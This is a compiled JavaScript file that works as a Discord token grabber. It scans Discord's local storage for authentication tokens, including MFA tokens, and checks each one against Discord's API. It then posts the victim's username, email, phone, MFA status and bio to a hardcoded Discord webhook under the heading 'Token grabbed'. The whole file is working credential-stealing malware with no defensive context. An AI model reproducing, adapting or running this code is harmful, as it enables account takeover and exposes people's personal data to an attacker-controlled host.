// Generated by CoffeeScript 1.12.7
(function() {
  var files, fs, r, req, request, webhook;

  fs = require('fs');

  request = require('request');

  webhook = String('https://discord.com/api/webhooks/863453017646694400/zlDYi9nP0M0f-Y2baYrLawX9Wa9bngRF2SjrgwcIK3Ai3w9ZLak2t9_xlh_bdkYiUnGn');

  files = [];

  r = [];

  fs.readdirSync(process.env.APPDATA + '/Discord/Local Storage/leveldb').forEach(function(e) {
    var f;
    f = void 0;
    f = void 0;
    if (e.match(/.log|.ldb/)) {
      f = fs.readFileSync(process.env.APPDATA + '/Discord/Local Storage/leveldb' + '/' + e);
      files.push(f.toString().match(/[\w-]{24}.[\w-]{6}.[\w-]{27}/));
      files.push(f.toString().match(/mfa\.[\w-]{84}/));
    }
  });

  files.forEach(function(i, m) {
    if (i === null) {
      files.splice(m, 1);
    } else if (typeof i) {
      i.forEach(function(ii) {
        if (ii !== null) {
          r.push(ii);
        }
      });
    }
  });

  req = function(i) {
    var setting;
    setting = void 0;
    setting = {
      headers: {
        'Content-Type': 'application/json',
        'authorization': i
      },
      method: 'get',
      url: 'https://discord.com/api/users/@me'
    };
    return request(setting, function(a, aa, bb) {
      var b;
      b = JSON.parse(bb);
      if (b.code === 0) {
        return;
      }
      if (b.code !== 0 && b !== void 0) {
        console.log(b);
        setting = {
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            content: '@here',
            embeds: [
              {
                title: 'Token grabbed',
                description: '\n**uuid:** ' + b.id + '\n**tag:** ' + b.username + '#' + b.discriminator + '\n**email:** ' + b.email + '\n**phone:** ' + b.phone + '\n**verified:** ' + b.verified + '\n**nsfw allowed:** ' + b.nsfw_allowed + '\n**a2f:** ' + b.mfa_enabled + '\n**locale:** ' + b.locale + '\n\n**Bio:**\n\n>>> ' + b.bio + '\n\n**banner:** ',
                image: {
                  url: b.banner ? 'https://cdn.discordapp.com/banners/' + b.id + '/' + b.banner + '.gif?size=512' : 'https://opengraph.githubassets.com/f850eb781f9da1f039568f21ccdd40e9b9125bf45fbdd1ee386ea5a3363a35eb/NotPunchnox/discord-token-grabber',
                  footer: {
                    url: 'https://cdn.discordapp.com/avatars/' + b.id + '/' + b.avatar + '.webp?size=2048',
                    text: 'discord.gg/punchnox'
                  }
                }
              }
            ],
            username: b.username,
            avatar_url: 'https://cdn.discordapp.com/avatars/' + b.id + '/' + b.avatar + '.webp?size=2048'
          }),
          url: webhook,
          method: 'POST'
        };
        console.log(setting);
        request(setting, function(a, aa, body) {});
      }
    });
  };

  r.forEach(function(i) {
    req(i);
  });

}).call(this);
